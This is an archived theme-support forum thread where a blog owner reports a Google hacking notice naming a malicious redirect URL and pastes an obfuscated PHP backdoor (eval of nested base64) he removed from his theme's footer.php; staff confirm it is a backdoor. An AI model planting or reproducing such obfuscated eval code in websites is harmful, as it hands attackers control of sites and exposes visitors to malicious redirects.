Jump to content

Archived

This topic is now archived and is closed to further replies.

Umar Adil

malicious code on my website blog

Recommended Posts

Umar Adil
Hi, My Blog (blog.socrato.com) is using DMS2 theme. Today I got an email from Google : ========================================================================================================== Notice of Suspected Hacking on http://blog.socrato.com/ Dear site owner or webmaster of http://blog.socrato.com/, We are writing to let you know that we believe some of your website's pages may be hacked. Specifically, we think that JavaScript has been injected into your site by a third party and may be used to redirect users to malicious sites. You should check your source code for any unfamiliar JavaScript and in particular any files containing "g="http://www.assofleurdelotus.fr/js/test.php",y=n.referrer". The malicious code may be placed in HTML, JavaScript or PHP files so it's important to be thorough in your search. The following are example URLs from your site where we found such content: http://blog.socrato.com/4-sources-to-help-you-find-cool-moocs/ http://blog.socrato.com/7-top-android-apps-for-sat-and-act-test-prep/ http://blog.socrato.com/common-core-standards-3-big-impacts-on-tutors/ In addition, it's also possible your server configuration files (such as Apache's .htaccess) have been compromised. As a result of this, your site may be cloaking and showing the malicious content only in certain situations. We encourage you to investigate this matter in order to protect your visitors. If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but also to identify and fix the vulnerability. A good first step may be to contact your web host's technical support for assistance. It's also important to make sure that your website's software is up-to-date with the latest security updates and patches. More information about cleaning your site can be found at: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163634 Sincerely, Google Search Quality Team ========================================================================================== I fixed this issue by removing some unwanted code from theme footer.php The removed code is ========================================================================================== <?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?> ========================================================================================== Can u help me in this regard, why was this creating issue?

--

Regards,

Umar Adil

Share this post


Link to post
Share on other sites
Danny

Hi,

 

It would appear you have been hacked with a backdoor. I would highly recommend you contact your web host provider and ask them to investigate. This isn't an issue with our product, but likely caused by your hosting, plugins you have installed and/or custom code you may have added.


Please search our forums, before posting!

Share this post


Link to post
Share on other sites
Umar Adil

Danny Was that code which I removed not a part of your theme?


--

Regards,

Umar Adil

Share this post


Link to post
Share on other sites
Danny

The code you remove was most certainly not part of DMS. However, if you want to make sure your footer file is back how it was intended. I would recommend you download a fresh copy of DMS from your PageLines account and then compare the two files.


Please search our forums, before posting!

Share this post


Link to post
Share on other sites

  • Similar Content

    • Lisa Haran
      By Lisa Haran+
      Hi 
      I have a map here http://www.iloveoffset.com/maps/
      I want to add several pointer locations to the map, but when I do they do not appear.
      On this map there are 2 pointer locations and as you can there is only one visible.
      Earlier today I added 7 and could only see 4 so there is something odd going on.
      My theme is up to date
    • clj182
      By clj182+
      Hello,
      I've been having trouble unlocking the template section for past couple of weeks. When I try clicking nothing happens. 
      I've deleted my custom css and removed plugins. Im down to having only the following plugins:
      Akismet
      Contact Form 7
      DMS Professional Tools
      Pagelines Updater
      WooCommerce
      It was working fine before i have no idea what's going on with it.
    • flourishdesignstudio
      By flourishdesignstudio+
      My DMS 2 site http://www.heart-stone.com/ will not save any new custom css... I can still edit templates and publish those but any custom css that I enter never saves.
      All WP files, themes, and plugins are up to date. 
      Any thought about what might be causing this?
    • flourishdesignstudio
      By flourishdesignstudio+
      Is there a way to edit the custom CSS via FTP? I know I can edit the custom code in the Chrome editor but is there a file path I can use to find and edit the CSS directly from our FTP?
      Thanks in advance for the help!
    • nizami
      By nizami+
      Using navbar section with correctly configured WP menu to display main navigation at https://elenaangel.com. 
      All fine in desktop viewport. Menu displays twice in hamburger mode. How to fix this please? 

×